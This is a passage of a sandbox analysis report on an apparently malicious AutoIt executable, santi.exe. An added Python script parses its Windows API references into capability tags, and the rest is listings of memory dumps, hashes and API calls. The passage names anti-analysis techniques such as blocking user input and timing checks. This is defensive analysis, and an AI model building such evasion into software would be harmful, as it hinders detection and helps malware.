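The API references in the records above (BlockInput, mouse_event, LogonUserW, SetUnhandledExceptionFilter and the __time64 / GetSystemTimeAsFileTime pair) are what back several of the signature lines at the top of this report: blocking mouse and keyboard input, executing programs as a different user, execution timing, and the unhandled-exception-filter check. What follows is an added example, not part of the Joe Sandbox report and not code from the sample: a Python parser for these "api.MODULE(args), ref: addr" lines that recovers API, module, argument values (with "?" kept as unresolved), the call-site address and any "Part of subcall function" nesting, decodes the mouse_event flag word, and tags each reference with the capability it implies. The sample lines are copied from the records above; the capability table, the function names and the MOUSEEVENTF constants are the editor's (the constants are the winuser.h values), and the clock-API list goes slightly beyond the page by including GetTickCount and QueryPerformanceCounter. One caveat for triage: every one of these call sites lies in the main santi.exe image (process 0, base 002E0000), and since the report identifies the binary as a compiled AutoIt script, their presence is consistent with the interpreter's built-in functions living in the stub; a capability tag on the stub says what the runtime can do, not what the embedded script actually calls, so the dynamic signatures (injection, credential theft, the Suricata hits) carry the verdict here, not this static listing.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# API reference lines copied verbatim from the function records above.
REPORT_API_LINES = [
    "• __time64.LIBCMT ref: 0032B6DF",
    "  • Part of subcall function 0030344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0032BDC3,00000000,?,?,?,?,0032BF70,00000000,?), ref: 00303453",
    "  • Part of subcall function 0030344A: __aulldiv.LIBCMT ref: 00303473",
    "• BlockInput.USER32(00000001), ref: 00336ACA",
    "• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003274DE",
    "• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0031AD3E), ref: 0031B124",
    "• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0030818F",
]

# One reference: optional "Part of subcall function <addr>:" prefix, then
# <api>.<MODULE>, an optional "(args)" list, and "ref: <call-site address>".
_API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report prints '?' (unresolved)
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # nested callee that issues the call, if any


def parse_api_line(line: str) -> Optional[ApiRef]:
    """Parse one report line; returns None for lines that are not API refs."""
    m = _API_RE.match(line.strip().lstrip("•").strip())
    if not m:
        return None
    args: List[Optional[int]] = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    sub = m.group("sub")
    return ApiRef(m.group("api"), m.group("mod"), args,
                  int(m.group("ref"), 16), int(sub, 16) if sub else None)


# dwFlags bits of user32!mouse_event (winuser.h values).
MOUSEEVENTF = {
    0x0001: "MOUSEEVENTF_MOVE", 0x0002: "MOUSEEVENTF_LEFTDOWN",
    0x0004: "MOUSEEVENTF_LEFTUP", 0x0008: "MOUSEEVENTF_RIGHTDOWN",
    0x0010: "MOUSEEVENTF_RIGHTUP", 0x0020: "MOUSEEVENTF_MIDDLEDOWN",
    0x0040: "MOUSEEVENTF_MIDDLEUP", 0x0800: "MOUSEEVENTF_WHEEL",
    0x8000: "MOUSEEVENTF_ABSOLUTE",
}


def mouse_event_flags(dw_flags: int) -> List[str]:
    # Symbolic names for the set bits; any bit not in the table is kept as hex.
    names = [n for bit, n in sorted(MOUSEEVENTF.items()) if dw_flags & bit]
    unknown = dw_flags & ~sum(MOUSEEVENTF)
    if unknown:
        names.append(f"0x{unknown:04X}")
    return names


# Editor's mapping from API to the capability the report's signature list
# calls out; an assumption of this example, not a Joe Sandbox table.
def capability(r: ApiRef) -> Optional[str]:
    if r.api == "BlockInput":
        # BlockInput(TRUE) stops the analyst's keyboard and mouse reaching the desktop.
        if r.args and r.args[0] == 1:
            return "blocks keyboard and mouse input (BlockInput(TRUE))"
        return "toggles keyboard/mouse input (BlockInput)"
    if r.api == "mouse_event":
        flags = r.args[0] if r.args and r.args[0] is not None else 0
        return "synthesizes mouse input: " + ",".join(mouse_event_flags(flags))
    if r.api in ("LogonUserW", "LogonUserA"):
        return "obtains a logon token for another user (run-as)"
    if r.api == "SetUnhandledExceptionFilter":
        return "installs a top-level exception filter"
    if r.api in ("GetSystemTimeAsFileTime", "__time64", "GetTickCount",
                 "QueryPerformanceCounter"):
        return "reads a clock (execution timing)"
    return None


def triage(lines: List[str]) -> Dict[str, List[str]]:
    """Map each capability to the call-site addresses that exhibit it."""
    found: Dict[str, List[str]] = {}
    for line in lines:
        r = parse_api_line(line)
        tag = capability(r) if r else None
        if tag is None:
            continue
        site = f"{r.ref:08X}"
        if r.subcall_of is not None:
            site += f" (via subcall {r.subcall_of:08X})"
        found.setdefault(tag, []).append(site)
    return found


if __name__ == "__main__":
    for tag, sites in triage(REPORT_API_LINES).items():
        print(f"{tag}: {', '.join(sites)}")
```

Run as a script it prints one line per capability with the call-site addresses, which is enough to jump straight to the relevant function in the disassembly; the subcall annotation matters because the report attributes GetSystemTimeAsFileTime to the __time64 wrapper at 0030344A rather than to the function that called it.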
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ca9c7e69ff5b502c698a547219600804c0c9160bf25c1e588586f51e2ab10e79
• Instruction ID: 84824e28f288e970bc246853737573d43f1e92bfe1ac228ef9f46a2882cff2ba
• Opcode Fuzzy Hash: ca9c7e69ff5b502c698a547219600804c0c9160bf25c1e588586f51e2ab10e79
• Instruction Fuzzy Hash: 4C22DE7096024ACFCF24DF59C480ABEF7B0FF18304F968069E94A9B351E371A995CB91
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 01d40df523f31e646244aefc77855cac8a9c42153abb869100928d70a3bae8cb
• Instruction ID: f8dae59b56e85be1708fb575ffb63c0589efcf599f08985e6614a307640daf32
• Opcode Fuzzy Hash: 01d40df523f31e646244aefc77855cac8a9c42153abb869100928d70a3bae8cb
• Instruction Fuzzy Hash: AF12B070A10609DFDF05DFA5D981AEEB3F9FF48300F50452AE806E7261EB36A964CB50
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 3728558374-0
• Opcode ID: 6372f44b67f486360dcf23116eb9cbf399b58001520c7ccd3d3f61b12228b304
• Instruction ID: 9cacd45d767c2f485f3dd656cc31560c2f5f35cd20ec1d5c12109e2ab855fa8c
• Opcode Fuzzy Hash: 6372f44b67f486360dcf23116eb9cbf399b58001520c7ccd3d3f61b12228b304
• Instruction Fuzzy Hash: 2802D270A10109DFCF05DF65D981AAFB7B5FF45300F518069E806EB2A5EB31DA25CB91
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction ID: d0937b15174dbb7f42106f790d30700bc3db00ec51d2f1a9148fbe7b7b6b2011
• Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction Fuzzy Hash: 03C1C5322161970ADF6E4A3A853453EFAA15EA27B171B077DD4B3CB4D2EF20C534DA20
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
• Instruction ID: 98ccbe165afa00536c60ae33dd1eb8b8c7fa622cf8d0e84162fe9b7f14c0d54e
• Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
• Instruction Fuzzy Hash: 12C1C1322161970ADF6E4639C53463EFAA15EA2BB171B077DD4B2CB4D6EF20C534DA20
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                • Instruction ID: 513006f30fb3b25ae0ad8ee4f4608f554d4f89925fe6747525456cc64a1dc32b
                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                • Instruction Fuzzy Hash: C4C1B1322261970ADF6E4A39853453EFAA15EA27F171A077DD4B2CB4D6EF20C534DA20
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                • Instruction ID: 53596054cb275bcb157aaf29eeda9a37e955eceb5ffa71530a2621a415cef7d6
                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                • Instruction Fuzzy Hash: 3BC1B33222509B09DFAD4A39C67043EFAA15EA2BF531A077DD5B2CB5D6EF20C534D620
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5604fd53303005f1fee5bf10358449c07e86a2c6aa25d725cbc22364d45bfee4
                                                                • Instruction ID: bde80e4ee5f126eb8cf98bc2b617e424cf3f96bc61f645f8053c76cf4c8d9644
                                                                • Opcode Fuzzy Hash: 5604fd53303005f1fee5bf10358449c07e86a2c6aa25d725cbc22364d45bfee4
                                                                • Instruction Fuzzy Hash: 7A518FDA85F6C28FCB428B74ACB8085FF708F2354936A48DFC990865D7F315452ADB52
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                • Instruction ID: 2791bbf4ad41763473b2259c06471fcd0ff5fd65537bf081f5e2c860906e675e
                                                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                • Instruction Fuzzy Hash: 9541B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                • Instruction ID: 8788a811f6c32aa9251847b4adbd506ce158f69ce1d23d5ccf59f44500cb38a2
                                                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                • Instruction Fuzzy Hash: BD015874A01109EFCB44DF98C6909ADF7F6FF48310F648599D919A7741DB30AE81DB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                • Instruction ID: 0a586937dd9654c04878f236deeba006497bb10748221dcac742d28b610fe523
                                                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                • Instruction Fuzzy Hash: 8A01A874A01109EFCB44DF98C6909AEF7F6FF48310F208699D819A7701DB30AE41DB80
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                APIs
                                                                • DeleteObject.GDI32(00000000), ref: 0033A2FE
                                                                • DeleteObject.GDI32(00000000), ref: 0033A310
                                                                • DestroyWindow.USER32 ref: 0033A31E
                                                                • GetDesktopWindow.USER32 ref: 0033A338
                                                                • GetWindowRect.USER32(00000000), ref: 0033A33F
                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0033A480
                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0033A490
                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A4D8
                                                                • GetClientRect.USER32(00000000,?), ref: 0033A4E4
                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0033A51E
                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A540
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A553
                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A55E
                                                                • GlobalLock.KERNEL32(00000000), ref: 0033A567
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A576
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0033A57F
                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A586
                                                                • GlobalFree.KERNEL32(00000000), ref: 0033A591
                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A5A3
                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0036D9BC,00000000), ref: 0033A5B9
                                                                • GlobalFree.KERNEL32(00000000), ref: 0033A5C9
                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0033A5EF
                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0033A60E
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A630
                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0033A81D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                • API String ID: 2211948467-2373415609
                                                                • Opcode ID: 23af255e5e6cc3af27c96f23d9df44cd5b815cfb025ae569e8cdfa2bedcde303
                                                                • Instruction ID: 9c45b4278cc883c534a89e4c61f30445be60efa97109199f50850dd6a7e84133
                                                                • Opcode Fuzzy Hash: 23af255e5e6cc3af27c96f23d9df44cd5b815cfb025ae569e8cdfa2bedcde303
                                                                • Instruction Fuzzy Hash: FD027C75A00214EFDB16DFA5DD89EAE7BB9FB49310F008158F905AB2A1C774ED41CB60
                                                                APIs
                                                                • SetTextColor.GDI32(?,00000000), ref: 0034D2DB
                                                                • GetSysColorBrush.USER32(0000000F), ref: 0034D30C
                                                                • GetSysColor.USER32(0000000F), ref: 0034D318
                                                                • SetBkColor.GDI32(?,000000FF), ref: 0034D332
                                                                • SelectObject.GDI32(?,00000000), ref: 0034D341
                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0034D36C
                                                                • GetSysColor.USER32(00000010), ref: 0034D374
                                                                • CreateSolidBrush.GDI32(00000000), ref: 0034D37B
                                                                • FrameRect.USER32(?,?,00000000), ref: 0034D38A
                                                                • DeleteObject.GDI32(00000000), ref: 0034D391
                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0034D3DC
                                                                • FillRect.USER32(?,?,00000000), ref: 0034D40E
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0034D439
                                                                  • Part of subcall function 0034D575: GetSysColor.USER32(00000012), ref: 0034D5AE
                                                                  • Part of subcall function 0034D575: SetTextColor.GDI32(?,?), ref: 0034D5B2
                                                                  • Part of subcall function 0034D575: GetSysColorBrush.USER32(0000000F), ref: 0034D5C8
                                                                  • Part of subcall function 0034D575: GetSysColor.USER32(0000000F), ref: 0034D5D3
                                                                  • Part of subcall function 0034D575: GetSysColor.USER32(00000011), ref: 0034D5F0
                                                                  • Part of subcall function 0034D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0034D5FE
                                                                  • Part of subcall function 0034D575: SelectObject.GDI32(?,00000000), ref: 0034D60F
                                                                  • Part of subcall function 0034D575: SetBkColor.GDI32(?,00000000), ref: 0034D618
                                                                  • Part of subcall function 0034D575: SelectObject.GDI32(?,?), ref: 0034D625
                                                                  • Part of subcall function 0034D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0034D644
                                                                  • Part of subcall function 0034D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0034D65B
                                                                  • Part of subcall function 0034D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0034D670
                                                                  • Part of subcall function 0034D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0034D698
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                • String ID:
                                                                • API String ID: 3521893082-0
                                                                • Opcode ID: 5b04e59eb41405060f90eaa0b760665a9bfac65ad3b0b2b165e1ea6859a20622
                                                                • Instruction ID: c6aba1e2c350149a8240e0b28453f01c7d2c5d9b263857064303ab842a3e347c
                                                                • Opcode Fuzzy Hash: 5b04e59eb41405060f90eaa0b760665a9bfac65ad3b0b2b165e1ea6859a20622
                                                                • Instruction Fuzzy Hash: 5F917F71908301BFC7129F64DC08A6B7BEDFF8A325F104A19F6629A1E0D7B1E944CB52
                                                                APIs
                                                                • DestroyWindow.USER32 ref: 002FB98B
                                                                • DeleteObject.GDI32(00000000), ref: 002FB9CD
                                                                • DeleteObject.GDI32(00000000), ref: 002FB9D8
                                                                • DestroyIcon.USER32(00000000), ref: 002FB9E3
                                                                • DestroyWindow.USER32(00000000), ref: 002FB9EE
                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0035D2AA
                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0035D2E3
                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0035D711
                                                                  • Part of subcall function 002FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002FB759,?,00000000,?,?,?,?,002FB72B,00000000,?), ref: 002FBA58
                                                                • SendMessageW.USER32 ref: 0035D758
                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0035D76F
                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0035D785
                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0035D790
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                • String ID: 0
                                                                • API String ID: 464785882-4108050209
                                                                • Opcode ID: 8c0891a445a164ae64f28a020db19c89c79877e26cc4f989d02ef4be1c023a6c
                                                                • Instruction ID: e12b85c4cddf37d583d8aae0e489861ba6aecd0f9a66a69f80840763298e2f7a
                                                                • Opcode Fuzzy Hash: 8c0891a445a164ae64f28a020db19c89c79877e26cc4f989d02ef4be1c023a6c
                                                                • Instruction Fuzzy Hash: 8612AC70604205DFDB22CF24C884FA9BBE4FF09306F554569EA89CB662C771E85ACF91
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0032DBD6
                                                                • GetDriveTypeW.KERNEL32(?,0037DC54,?,\\.\,0037DC00), ref: 0032DCC3
                                                                • SetErrorMode.KERNEL32(00000000,0037DC54,?,\\.\,0037DC00), ref: 0032DE29
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
